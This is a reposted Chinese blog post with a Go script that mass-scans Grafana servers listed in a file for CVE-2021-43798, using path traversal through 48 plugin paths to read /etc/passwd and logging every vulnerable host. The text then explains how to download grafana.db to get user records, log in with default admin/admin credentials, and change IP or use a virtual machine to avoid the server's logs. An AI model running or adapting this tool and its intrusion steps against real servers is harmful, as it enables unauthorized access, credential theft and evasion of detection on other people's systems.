【原创】CVE-2021-43798 grafana批量验证脚本

admin 2022年12月3日16:26:11评论21 views字数 2700阅读9分0秒阅读模式

项目地址:https://github.com/light-Life/CVE-2021-43798

用golang简单写的脚本

package main

import (
	"bufio"
	"fmt"
	"io"
	"io/ioutil"
	"net/http"
	url2 "net/url"
	"os"
	"strings"
)

func main() {
	fileOpen, err := os.Open("url.txt")
	line := bufio.NewReader(fileOpen)
	if err != nil {
		fmt.Println(err)
	}
	test := []string{
		"/public/plugins/alertGroups/",
		"/public/plugins/alertlist/",
		"/public/plugins/alertmanager/",
		"/public/plugins/annolist/",
		"/public/plugins/barchart/",
		"/public/plugins/bargauge/",
		"/public/plugins/canvas/",
		"/public/plugins/cloudwatch/",
		"/public/plugins/dashboard/",
		"/public/plugins/dashlist/",
		"/public/plugins/debug/",
		"/public/plugins/elasticsearch/",
		"/public/plugins/gauge/",
		"/public/plugins/geomap/",
		"/public/plugins/gettingstarted/",
		"/public/plugins/grafana-azure-monitor-datasource/",
		"/public/plugins/grafana/",
		"/public/plugins/graph/",
		"/public/plugins/graphite/",
		"/public/plugins/heatmap/",
		"/public/plugins/histogram/",
		"/public/plugins/influxdb/",
		"/public/plugins/jaeger/",
		"/public/plugins/live/",
		"/public/plugins/logs/",
		"/public/plugins/loki/",
		"/public/plugins/mixed/",
		"/public/plugins/mssql/",
		"/public/plugins/mysql/",
		"/public/plugins/news/",
		"/public/plugins/nodeGraph/",
		"/public/plugins/opentsdb/",
		"/public/plugins/piechart/",
		"/public/plugins/pluginlist/",
		"/public/plugins/postgres/",
		"/public/plugins/prometheus/",
		"/public/plugins/stat/",
		"/public/plugins/state-timeline/",
		"/public/plugins/status-history/",
		"/public/plugins/table-old/",
		"/public/plugins/table/",
		"/public/plugins/tempo/",
		"/public/plugins/testdata/",
		"/public/plugins/text/",
		"/public/plugins/timeseries/",
		"/public/plugins/welcome/",
		"/public/plugins/xychart/",
		"/public/plugins/zipkin"}
	file, err := os.Create("test.txt") //创建文件
	if err != nil {
		fmt.Println(err)
	}
	for {
		content, _, err := line.ReadLine()
		if err == io.EOF {
			break
		}
		fmt.Println(string(content))
		for i := 0; i < 48; i++ {
			url := string(content) + test[i] + url2.QueryEscape("../../../../../../../../../../../../../../../../../etc/passwd")
			//fmt.Println(url)
			resp, err := http.Get(url)
			if err != nil {
				fmt.Println(err)
				continue //continue忽略当前循环体内的剩下代码,相当于python异常里的pass,
				// 这里很关键,如果这里有错误,下面ioutil.ReadAll就无法读取到数据,
				// 就会报空指针错误,加上return返回一下因为这里没值,所以就相当于python的pass。
			}
			fmt.Println(resp, url)
			body, err := ioutil.ReadAll(resp.Body)
			if err != nil {
				fmt.Println(body, err)
			}
			if find := strings.Contains(string(body), "root:"); find {
				fmt.Println("\n\u001B[1;32m[+] 存在漏洞\u001B[0m", url)
				data, err := io.WriteString(file, url+"\n")
				fmt.Println("\n\u001B[1;33m[+] 正在写入\u001B[0m")
				if err != nil {
					fmt.Println(data, err)
				}
				break
			} else {
				fmt.Println("\n\u001B[1;31m[-] 无法识别\u001B[0m", url)
			}
		}
	}
}

直接go run hello.go运行即可

【原创】CVE-2021-43798 grafana批量验证脚本

验证存在后访问var/lib/grafana/grafana.db

即可下载这个数据库文件打开user的表

【原创】CVE-2021-43798 grafana批量验证脚本

密码是加了盐的,一般无法破解(加盐是为了应对短密码被彩虹表爆出来
也就是碰撞盐(salt)是个随机值,加密大概公式为md5(md5(passwd)+salt)每多一位破解难度成指数上升)

发现这login为admin的一般密码也为admin

登录进去即可,记得改ip或在虚拟机登录,后台会有详细记录的

【原创】CVE-2021-43798 grafana批量验证脚本

FROM:浅浅淡淡[hellohy]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:26:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【原创】CVE-2021-43798 grafana批量验证脚本https://cn-sec.com/archives/1442688.html

发表评论

匿名网友 填写信息